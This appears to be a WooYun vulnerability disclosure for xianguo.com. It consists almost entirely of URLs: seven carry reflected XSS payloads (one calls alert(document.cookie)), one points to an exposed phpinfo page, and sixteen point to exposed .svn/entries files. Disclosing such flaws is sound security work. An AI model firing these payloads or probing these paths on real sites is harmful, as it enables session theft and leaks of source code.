WooYun.org

1.XSS
http://xianguo.com/book/list/%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28document.cookie%29%3C%2fScRiPt%3E
http://xianguo.com/1378130/favorite?sk="><script>alert(/xss/)</script>
http://xianguo.com/bang/search?keyword=1%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E
http://xianguo.com/booklist/list/?beingsId=1034563&pi=0&sub=1%22%3E%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E
http://xianguo.com/bang/?pi="><script>alert(/xss/)</script>
http://xianguo.com/bang/search?keyword=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28910644%29%3c%2fScRiPt%3e
http://xianguo.com/index/list?id=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28913007%29%3c%2fScRiPt%3e&type=tag
2.PHPinfo
http://app.xianguo.com/lianbo/i.php
3.SVN
http://app.xianguo.com/.svn/entries
http://app.xianguo.com/book/.svn/entries
http://app.xianguo.com/book/images/.svn/entries
http://app.xianguo.com/book/images/android/.svn/entries
http://app.xianguo.com/download/.svn/entries
http://app.xianguo.com/images/.svn/entries
http://app.xianguo.com/lianbo/.svn/entries
http://app.xianguo.com/lianbo/appdown/.svn/entries
http://app.xianguo.com/lianbo/images/.svn/entries
http://app.xianguo.com/lianbo/images/android/.svn/entries
http://app.xianguo.com/lianbo/images/android_hd/.svn/entries
http://app.xianguo.com/lianbo/images/ipad/.svn/entries
http://app.xianguo.com/lianbo/images/iphone/.svn/entries
http://app.xianguo.com/lianbo/images/wp7/.svn/entries
http://app.xianguo.com/lianbo/images/wp8/.svn/entries
http://app.xianguo.com/logs/.svn/entries